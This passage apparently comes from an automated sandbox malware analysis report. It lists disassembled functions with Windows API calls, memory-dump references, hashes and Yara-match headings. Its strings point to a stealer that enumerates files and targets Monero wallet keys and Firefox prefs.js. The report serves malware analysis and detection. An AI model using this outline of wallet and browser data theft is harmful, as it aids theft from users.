                                    • wsprintfA.USER32 ref: 0008ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0008ED55
                                    • StrCmpCA.SHLWAPI(?,000A1538), ref: 0008EDAB
                                    • StrCmpCA.SHLWAPI(?,000A153C), ref: 0008EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 0008F2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                    • Instruction ID: e47a9560e908060eee7d60334693630180b6ab3e19a9b81e108ebefa5adf73b7
                                    • Opcode Fuzzy Hash: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                    • Instruction Fuzzy Hash: D4E1BF72A111189ADF54FB60DC56EEE7378AF55300F4041A9B50A66093EF306F8ADFA2
                                    Function 0008F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A15B8,000A0D96), ref: 0008F71E
                                    • StrCmpCA.SHLWAPI(?,000A15BC), ref: 0008F76F
                                    • StrCmpCA.SHLWAPI(?,000A15C0), ref: 0008F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0008FAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                    • Instruction ID: 7a4cb63954ac0fd97b0ae3ce13ad8a996de632e33909f512e23be2b31ee8c147
                                    • Opcode Fuzzy Hash: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                    • Instruction Fuzzy Hash: 0EB14F71A101189BDF24FF70DC96EEE7379BF55300F4081A8A54A9A192EF306B49DBD2
                                    Function 000816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A510C,?,?,?,000A51B4,?,?,00000000,?,00000000), ref: 00081923
                                    • StrCmpCA.SHLWAPI(?,000A525C), ref: 00081973
                                    • StrCmpCA.SHLWAPI(?,000A5304), ref: 00081989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00081D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00081DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00081E20
                                    • FindClose.KERNEL32(000000FF), ref: 00081E32
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: c0e1d9ca4e857002bf6259f725d7bec2bbafe2a22c112666ee493b98418ecc4d
                                    • Instruction ID: 5292498df5bd8c66e5c56bb3b65f96054af7b6da1a6716a04c4fba5dfbad6f2b
                                    • Opcode Fuzzy Hash: c0e1d9ca4e857002bf6259f725d7bec2bbafe2a22c112666ee493b98418ecc4d
                                    • Instruction Fuzzy Hash: C312CD71A10118ABDF15FB60DC96EEE7378BF55300F404199A50A66092EF706F89DFE2
                                    Function 0008DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000A0C2E), ref: 0008DE5E
                                    • StrCmpCA.SHLWAPI(?,000A14C8), ref: 0008DEAE
                                    • StrCmpCA.SHLWAPI(?,000A14CC), ref: 0008DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 0008E3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: f3a0de8a7192376be8c2d57a21fcf6d5a837e6d24efa5755a30c7d7a6efabc1f
                                    • Instruction ID: 68ac8c5287533fb878b18d4ab7af8448c13f6efb219644ed3835148c7220d62f
                                    • Opcode Fuzzy Hash: f3a0de8a7192376be8c2d57a21fcf6d5a837e6d24efa5755a30c7d7a6efabc1f
                                    • Instruction Fuzzy Hash: 26F191719241289ADF15FB60DC95EEE7378BF15300F4041DAB51A66092EF306F8ADFA2
                                    Function 0008DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A14B0,000A0C2A), ref: 0008DAEB
                                    • StrCmpCA.SHLWAPI(?,000A14B4), ref: 0008DB33
                                    • StrCmpCA.SHLWAPI(?,000A14B8), ref: 0008DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 0008DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 45a33dbe8b6dc25ccca459e9e035aabeae628abe7acacdb18343a7d53927abed
                                    • Instruction ID: 327a6f51d0521cd1beae36e7ed03c7cc846d7e005170c4ca4bb0bed9772ca8fa
                                    • Opcode Fuzzy Hash: 45a33dbe8b6dc25ccca459e9e035aabeae628abe7acacdb18343a7d53927abed
                                    • Instruction Fuzzy Hash: 6D912172A1011897CF14FBB0EC5ADEE737DBB85300F408659B94A96182EE349B09DBD2
                                    Function 00097B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,000A05AF), ref: 00097BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00097BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00097C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00097C62
                                    • LocalFree.KERNEL32(00000000), ref: 00097D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 81166046b76b0cb69d5a1ea2eab6c255d183ea6b8b1b6a2b9a319fb7a0d2b7c2
                                    • Instruction ID: 07cb86b741787c115480b0ffb1b5d5c5a2381c1c5d1427cb1d921ace4a507326
                                    • Opcode Fuzzy Hash: 81166046b76b0cb69d5a1ea2eab6c255d183ea6b8b1b6a2b9a319fb7a0d2b7c2
                                    • Instruction Fuzzy Hash: AF412B71951218ABDF24DB94DC99BEEB3B4FF44700F204199E10966191DB342F85DFA1
                                    Function 0008E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000A0D73), ref: 0008E4A2
                                    • StrCmpCA.SHLWAPI(?,000A14F8), ref: 0008E4F2
                                    • StrCmpCA.SHLWAPI(?,000A14FC), ref: 0008E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 11a605ee506d1920a2818185598b50d551986f91ecfaf2f786b8a4e9a60723e0
                                    • Instruction ID: d3efdca41f8e1e66c50a18dd04c21ce4823f7f53fccc19982cf5cb1acbd87cae
                                    • Opcode Fuzzy Hash: 11a605ee506d1920a2818185598b50d551986f91ecfaf2f786b8a4e9a60723e0
                                    • Instruction Fuzzy Hash: 94120F71A101189ADF18FBB0DC96EEE7379BF55300F4045A9B50A96092EF306F49DBE2
                                    Function 0044B7AE Relevance: 9.1, Strings: 6, Instructions: 1644COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *(iY$Go~?$gJw]$qo`$xH'R$-rz
                                    • API String ID: 0-1502928147
                                    • Opcode ID: c1b401dcada12f524afc65413d8f88efa0eb1a08fc11c5704aa6dba035586517
                                    • Instruction ID: 56a78a09a9ce7c9c1e3c37040015eab4ad914228ceab741a8d6f338ed85e6e3d
                                    • Opcode Fuzzy Hash: c1b401dcada12f524afc65413d8f88efa0eb1a08fc11c5704aa6dba035586517
                                    • Instruction Fuzzy Hash: 4AB21BF360C214AFE704AE2DDC8567ABBE9EF94320F1A493DEAC4C3744E53598058697
                                    Function 00450887 Relevance: 9.0, Strings: 6, Instructions: 1518COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 73U $>o^$rrI<$rvY6$-;[$j7{
                                    • API String ID: 0-3469731591
                                    • Opcode ID: 9c5168011601cd8bffb042fd3ee50f255f43d64a298aacf5a3826a44d893415f
                                    • Instruction ID: 2b76dbb7d15591dc985a1328f1b0a0062dd91580c8f9ad197ffc855e45438d56
                                    • Opcode Fuzzy Hash: 9c5168011601cd8bffb042fd3ee50f255f43d64a298aacf5a3826a44d893415f
                                    • Instruction Fuzzy Hash: 6FB2E0B390C204AFE3046F29EC8567AFBE5EF94720F16492DEAC887740E6355845CB97
                                    Function 00455794 Relevance: 7.9, Strings: 5, Instructions: 1608COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
